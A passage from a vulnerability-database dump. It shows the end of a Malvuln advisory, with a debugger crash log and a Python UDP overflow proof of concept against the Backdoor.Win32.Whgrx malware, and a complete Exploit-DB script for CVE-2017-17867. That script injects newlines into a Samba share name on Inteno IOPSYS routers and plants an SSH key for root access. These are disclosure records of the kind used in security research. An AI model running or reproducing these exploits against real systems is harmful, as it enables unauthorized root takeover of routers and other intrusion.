\n \nMOD_LIST: <ANALYSIS/> \n \nNTGLOBALFLAG: 0 \n \nAPPLICATION_VERIFIER_FLAGS: 0 \n \nCONTEXT: 043bd904 -- (.cxr 0x43bd904) \neax=043bfe84 ebx=00001fd3 ecx=00000000 edx=42424242 esi=026a2040 edi=00404018 \neip=004040a8 esp=043bdd64 ebp=043bfe88 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 \nBackdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+0x40a8: \n004040a8 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:4242423a=???????? \nResetting default scope \n \nADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] \n \nLAST_CONTROL_TRANSFER: from 42424242 to 004040a8 \n \nFAULTING_THREAD: ffffffff \n \nBUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_42424242 \n \nPRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_EXPLOITABLE_FILL_PATTERN_42424242 \n \nDEFAULT_BUCKET_ID: STACK_OVERFLOW_EXPLOITABLE_FILL_PATTERN_42424242 \n \nIP_ON_HEAP: 42424242 \nThe fault address in not in any loaded module, please check your build's rebase \nlog at <releasedir>\\bin\\build_logs\\timebuild\\ntrebase.log for module which may \ncontain the address if it were loaded. 
\n \nIP_IN_FREE_BLOCK: 42424242 \n \nFRAME_ONE_INVALID: 1 \n \nSTACK_TEXT: \n043bdd64 004040a8 backdoor_win32_whgrx+0x40a8 \n043bfe90 42424242 unknown!printable+0x0 \n043bff44 0041acef backdoor_win32_whgrx+0x1acef \n043bff74 00404042 backdoor_win32_whgrx+0x4042 \n043bff88 76e38654 kernel32!BaseThreadInitThunk+0x24 \n043bff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f \n043bffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b \n \n \nSTACK_COMMAND: .cxr 00000000043BD904 ; kb ; dds 43bdd64 ; kb \n \nSYMBOL_NAME: kernel32!BaseThreadInitThunk+0 \n \nFOLLOWUP_NAME: MachineOwner \n \nMODULE_NAME: kernel32 \n \nIMAGE_NAME: kernel32.dll \n \nDEBUG_FLR_IMAGE_TIMESTAMP: 744765ce \n \nFAILURE_BUCKET_ID: STACK_OVERFLOW_EXPLOITABLE_FILL_PATTERN_42424242_c0000005_kernel32.dll!BaseThreadInitThunk \n \nBUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_42424242_BAD_IP_kernel32!BaseThreadInitThunk+0 \n \n \n0:002> !exchain 
\n043bdd68: Backdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+74a40 (00474a40) \n043bfeac: 42424242 \nInvalid exception stack at 42424242 \n \n \nExploit/PoC: \nfrom socket import * \n \nMALWARE_HOST=\"x.x.x.x\" \nPORT=65000 \n \ndef doit(): \n#UDP Protocol \ns=socket(AF_INET, SOCK_DGRAM) \ns.connect((MALWARE_HOST, PORT)) \n \nPACKO=\"PUT /\"+\"A\"*6000+ \"HTTP/1.1\\r\\nHost: \"+\"B\"*2126 \n \ns.send(PACKO) \ns.close() \nprint(\"Backdoor.Win32.Whgrx / Remote Host Header Stack Buffer Overflow\"); \nprint(\"MD5: eb6fd418cd3b52132ffb029b52839edf\"); \nprint(\"By Malvuln\"); \n \nif __name__==\"__main__\": \ndoit() \n \n \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160983/MVID-2021-0030.txt"}], "exploitdb": [{"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17867"], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49438", "href": "https://www.exploit-db.com/exploits/49438", "sourceData": "# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)\r\n# Date: 2020-03-29\r\n# Exploit Author: Henrik Pedersen\r\n# Vendor Homepage: https://intenogroup.com/\r\n# Version: Iopsys <3.16.5\r\n# Fixed Version: Iopsys 3.16.5\r\n# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router\r\n\r\n# Description:\r\n# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno\u2019s Iopsys routers before 3.16.5. 
This made it possible to change the configurations in smb.conf, giving root access to the filesystem.\r\n\r\n# Patch in release\r\n# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt\r\n\r\n# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/\r\n\r\n#!/usr/bin/python3\r\nimport json\r\nimport sys\r\nimport os\r\nimport time\r\nimport argparse\r\nfrom websocket import create_connection\r\nfrom impacket.smbconnection import SMBConnection\r\nfrom impacket.examples.smbclient import MiniImpacketShell\r\n\r\n\"\"\"\r\nRoot filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5\r\n\r\nUsage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host>\r\n\r\nRequires:\r\nimpacket\r\nwebsocket-client\r\n\r\nOn Windows:\r\npyreadline\r\n\r\n\"\"\"\r\n\r\ndef ubusAuth(host, username, password):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\r\n \"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [\r\n \"00000000000000000000000000000000\",\"session\",\"login\",\r\n {\"username\": username,\"password\": password}\r\n ],\r\n \"id\": 666\r\n })\r\n ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n key = response.get('result')[1].get('ubus_rpc_session')\r\n except IndexError:\r\n return None\r\n return key\r\n\r\ndef ubusCall(host, key, namespace, argument, params={}):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [key,namespace,argument,params],\r\n \"id\": 666})\r\n 
ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n result = response.get('result')[1]\r\n except IndexError:\r\n if response.get('result')[0] == 0:\r\n return True\r\n return None\r\n return result\r\n\r\ndef auth(host, user, password):\r\n print(\"Authenticating...\")\r\n key = ubusAuth(host, user, password)\r\n if not key:\r\n print(\"[-] Auth failed!\")\r\n sys.exit(1)\r\n print(f\"[+] Auth successful\")\r\n return key\r\n\r\ndef smb_put(args):\r\n username = \"\"\r\n password = \"\"\r\n\r\n try:\r\n smbClient = SMBConnection(args.host, args.host, sess_port=445)\r\n smbClient.login(username, password, args.host)\r\n\r\n print(\"Reading SSH key\")\r\n try:\r\n with open(args.key_path, \"r\") as fd:\r\n sshkey = fd.read()\r\n except IOError:\r\n print(f\"[-] Error reading {args.sshkey}\")\r\n \r\n print(\"Creating temp file for authorized_keys\")\r\n try:\r\n with open(\"authorized_keys\", \"w\") as fd:\r\n fd.write(sshkey)\r\n path = os.path.realpath(fd.name)\r\n except IOError:\r\n print(\"[-] Error creating authorized_keys\")\r\n\r\n shell = MiniImpacketShell(smbClient)\r\n shell.onecmd(\"use pwned\")\r\n shell.onecmd(\"cd /etc/dropbear\")\r\n shell.onecmd(f\"put {fd.name}\") \r\n\r\n print(\"Cleaning up...\")\r\n os.remove(path)\r\n except Exception as e:\r\n print(\"[-] Error connecting to SMB share:\")\r\n print(str(e))\r\n sys.exit(1)\r\n\r\ndef main(args):\r\n payload = \"pwned]\\npath=/\\nguest ok=yes\\nbrowseable=yes\\ncreate mask=0755\\nwriteable=yes\\nforce user=root\\n[abc\"\r\n key = auth(args.host, args.user, args.passwd)\r\n print(\"Adding Samba share...\")\r\n smbcheck = json.dumps(ubusCall(args.host, key, \"uci\", \"get\", {\"config\":\"samba\"}))\r\n if \"pwned\" in smbcheck:\r\n print(\"[*] Samba share seems to already exist, skipping\")\r\n else:\r\n smba = ubusCall(args.host, key, \"uci\", \"add\", {\r\n \"config\": \"samba\", \r\n \"type\":\"sambashare\", \r\n \"values\": {\r\n \"name\": payload, \r\n 
\"read_only\": \"no\", \r\n \"create_mask\":\"0775\", \r\n \"dir_mask\":\"0775\",\r\n \"path\": \"/mnt/\", \r\n \"guest_ok\": \"yes\"\r\n }\r\n })\r\n if not smba:\r\n print(\"[-] Adding Samba share failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Enabling Samba...\")\r\n smbe = ubusCall(args.host, key, \"uci\", \"set\",\r\n {\"config\":\"samba\", \"type\":\"samba\", \"values\":\r\n {\"interface\":\"lan\"}})\r\n if not smbe:\r\n print(\"[-] Enabling Samba failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Committing changes...\")\r\n smbc = ubusCall(args.host, key, \"uci\", \"commit\",\r\n {\"config\":\"samba\"})\r\n if not smbc:\r\n print(\"[-] Committing changes failed!\")\r\n sys.exit(1)\r\n \r\n if args.key_path:\r\n # Allow the service to start\r\n time.sleep(2)\r\n smb_put(args)\r\n print(f\"[+] Exploit complete. Try \\\"ssh -i id_rsa root@{args.host}\\\"\")\r\n else:\r\n print(\"[+] Exploit complete, SMB share added.\")\r\n\r\ndef parse_args(args):\r\n \"\"\" Create the arguments \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-u\", dest=\"user\", help=\"Username\", default=\"user\")\r\n parser.add_argument(\"-p\", dest=\"passwd\", help=\"Password\", default=\"user\")\r\n parser.add_argument(\"-k\", dest=\"key_path\", help=\"Public ssh key path\")\r\n parser.add_argument(dest=\"host\", help=\"Target host\")\r\n\r\n if len(sys.argv) < 2:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n return parser.parse_args(args)\r\n\r\nif __name__ == \"__main__\":\r\n main(parse_args(sys.argv[1:]))", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49438"}]}